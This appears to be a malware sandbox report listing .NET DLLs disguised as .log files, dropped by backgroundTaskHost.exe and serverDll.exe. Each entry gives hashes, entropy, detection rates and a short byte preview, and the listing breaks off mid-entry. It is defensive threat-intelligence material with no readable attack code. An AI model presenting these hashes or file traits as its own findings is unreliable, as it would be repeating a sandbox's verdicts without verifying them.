                                                                                          C:\Users\user\Desktop\aBvrGPVb.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38912
                                                                                          Entropy (8bit):5.679286635687991
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\axWajGSg.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):342528
                                                                                          Entropy (8bit):6.170134230759619
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\biYRKJQS.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33792
                                                                                          Entropy (8bit):5.541771649974822
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\diBqqUdY.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):46592
                                                                                          Entropy (8bit):5.870612048031897
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\dkLAftUN.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294912
                                                                                          Entropy (8bit):6.010605469502259
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Users\user\Desktop\ermiNMVU.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):85504
                                                                                          Entropy (8bit):5.8769270258874755
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                          C:\Users\user\Desktop\fknZLDhU.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):70144
                                                                                          Entropy (8bit):5.909536568846014
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\hYrhxRdS.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38400
                                                                                          Entropy (8bit):5.699005826018714
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\hrAYEvpK.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36352
                                                                                          Entropy (8bit):5.668291349855899
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\hzjriePQ.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38400
                                                                                          Entropy (8bit):5.699005826018714
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\jRHPiNPQ.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126976
                                                                                          Entropy (8bit):6.057993947082715
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                          C:\Users\user\Desktop\kOiXENdL.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):32256
                                                                                          Entropy (8bit):5.631194486392901
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\nQUGZwiG.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):5.857602289000348
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\oHiYBjVt.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.629584586954759
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\oOwOvwxB.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33792
                                                                                          Entropy (8bit):5.541771649974822
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\qHLxhtiz.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38912
                                                                                          Entropy (8bit):5.679286635687991
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\rEmFCtxu.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.660491370279985
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\riqoYKNp.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):342528
                                                                                          Entropy (8bit):6.170134230759619
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\sNXxZlqq.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):69632
                                                                                          Entropy (8bit):5.932541123129161
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                          C:\Users\user\Desktop\uhRxJqon.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34816
                                                                                          Entropy (8bit):5.636032516496583
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
